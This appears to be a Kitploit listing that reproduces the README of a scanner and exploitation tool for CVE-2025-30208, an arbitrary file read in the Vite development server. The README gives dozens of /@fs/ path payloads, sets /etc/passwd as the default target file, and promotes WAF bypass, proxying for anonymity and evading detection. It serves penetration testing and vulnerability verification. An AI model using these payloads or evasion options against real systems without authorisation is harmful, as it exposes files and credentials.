Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-30208 — CVE‑2025‑30208 is a medium-severity arbitrary file read vulnerability in the Vite development server (a popular frontend build tool) | Kitploit
Tools/GitHubGitHub/th-secforge/cve-2025-30208
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHubth-secforge/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208 is a medium-severity arbitrary file read vulnerability in the Vite development server (a popular frontend build tool)

View Repository
1431 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

🔥 CVE-2025-30208 Vite Arbitrary File Read Vulnerability Scanner

Python License Security Status Modular

Advanced vulnerability scanner for CVE-2025-30208 with enterprise-grade features

Professional penetration testing tool for Vite Arbitrary File Read vulnerability detection

🚀 Quick Start • 📋 Features • 🔧 Usage • 📊 Examples • 🛡️ Security


📖 Overview

This is a comprehensive vulnerability scanner designed to detect and exploit the CVE-2025-30208 vulnerability in Vite development servers. The vulnerability allows arbitrary file read access through Vite's file system endpoints, potentially exposing sensitive configuration files, source code, and system information.

🎯 What This Tool Does

  • Detects vulnerable Vite instances across networks
  • Exploits the arbitrary file read vulnerability safely
  • Discovers sensitive files and configuration data
  • Reports findings in multiple formats (HTML, JSON, Console)
  • Manages scanning sessions and configurations
  • Handles errors gracefully with automatic retry mechanisms

🏗️ Modular Architecture

The tool now features a modular architecture for better maintainability and extensibility:

  • CVE-2025-30208.py - Main scanner application
  • payloads.py - Advanced exploitation payloads (60+ variations)
  • sensitive_files.py - Comprehensive sensitive file database (200+ files)
  • html_template.py - Enhanced hacker-style HTML reporting template

🚀 Quick Start

Prerequisites

pip3 install -r requirements.txt

Basic Usage

python3 CVE-2025-30208.py

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run

📋 Features

🔍 Core Vulnerability Detection

  • 60+ Advanced Payloads: Comprehensive exploitation techniques for maximum detection
  • Smart Detection: Intelligent response analysis to avoid false positives
  • Real-time Validation: Continuous validation of target responses
  • Comprehensive Testing: Tests all known vulnerable endpoints

🛡️ Enhanced Security Features

  • Proxy Support: HTTP/HTTPS proxy configuration for anonymity
  • Custom Headers: Bypass WAF/IPS with custom HTTP headers
  • Rate Limiting: Configurable delays to avoid detection
  • Session Management: Save and restore scanning sessions
  • Input Validation: Comprehensive parameter validation

🔧 Advanced Capabilities

  • Batch Scanning: Multi-threaded scanning of multiple targets
  • Sensitive File Discovery: Automated discovery of 200+ sensitive files
  • Connectivity Testing: TCP/UDP/HTTP/HTTPS protocol testing
  • Error Recovery: Automatic retry with exponential backoff
  • Comprehensive Logging: Detailed logs with timestamps

📊 Reporting & Output

  • 🎨 Enhanced HTML Reports: Beautiful hacker-style vulnerability reports with animations
  • JSON Export: Structured data for further analysis
  • Console Output: Color-coded real-time feedback
  • Log Files: Detailed audit trails
  • Interactive Web Interface: Built-in web server for viewing reports

🔧 Usage Guide

1. Basic Configuration

CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd

CVE-2025-30208 > test

2. Vulnerability Testing

CVE-2025-30208 > run

# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run

3. Batch Scanning

CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch

192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]

4. Sensitive File Discovery

CVE-2025-30208 > scan

5. Advanced Configuration

# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080

# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}

# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0

6. Enhanced HTML Reporting

# Generate beautiful HTML report
CVE-2025-30208 > pull

# Start web server to view report
CVE-2025-30208 > web

# Start web server on specific port
CVE-2025-30208 > web 8081

# Stop web server
CVE-2025-30208 > web off

📊 Command Reference

CommandDescriptionExample
set <option> <value>Set configuration optionsset RHOST 192.168.1.100
show optionsDisplay current settingsshow options
editInteractive option editoredit
run / exploitRun vulnerability testrun
batchBatch scan multiple targetsbatch
scanDiscover sensitive filesscan
pullExport results to HTML/JSONpull
web [on|off|port]Web server for HTML reportsweb 8080
saveSave session configurationsave
loadLoad session configurationload
testTest connectivity to targettest
validateValidate current configurationvalidate
verboseToggle verbose modeverbose
proxyConfigure proxy settingsproxy
headersSet custom HTTP headersheaders
rateConfigure rate limitingrate
logShow logging informationlog
help / ?Show helphelp
exit / quitExit toolexit

⚙️ Configuration Options

OptionDescriptionDefaultValidation
RHOSTTarget host/IP address-Hostname/IP validation
RPORTTarget port number-Port range (1-65535)
FILEPATHFile path to testetc/passwdPath validation
PROXYHTTP/HTTPS proxy URL-URL format validation
VERBOSEEnable verbose outputfalseBoolean validation
RATE_LIMITDelay between requests (seconds)0.3Numeric validation
THREADSNumber of threads for batch scanning5Integer validation
TIMEOUTRequest timeout (seconds)5Integer validation
CUSTOM_HEADERSCustom HTTP headers (JSON){}JSON format validation

🎨 Enhanced Payload System

The scanner now uses 60+ different payload variations organized in payloads.py:

Primary @fs Payloads

/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url

Extended Parameter Variations

/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8

Vite-Specific Variations

/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug

Module System Variations

/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html

Alternative Endpoints

/app/{file_path}?raw??
/App/{file_path}?raw??

🔍 Enhanced Sensitive File Discovery

The tool now tests for 200+ sensitive files organized in sensitive_files.py:

Download Tool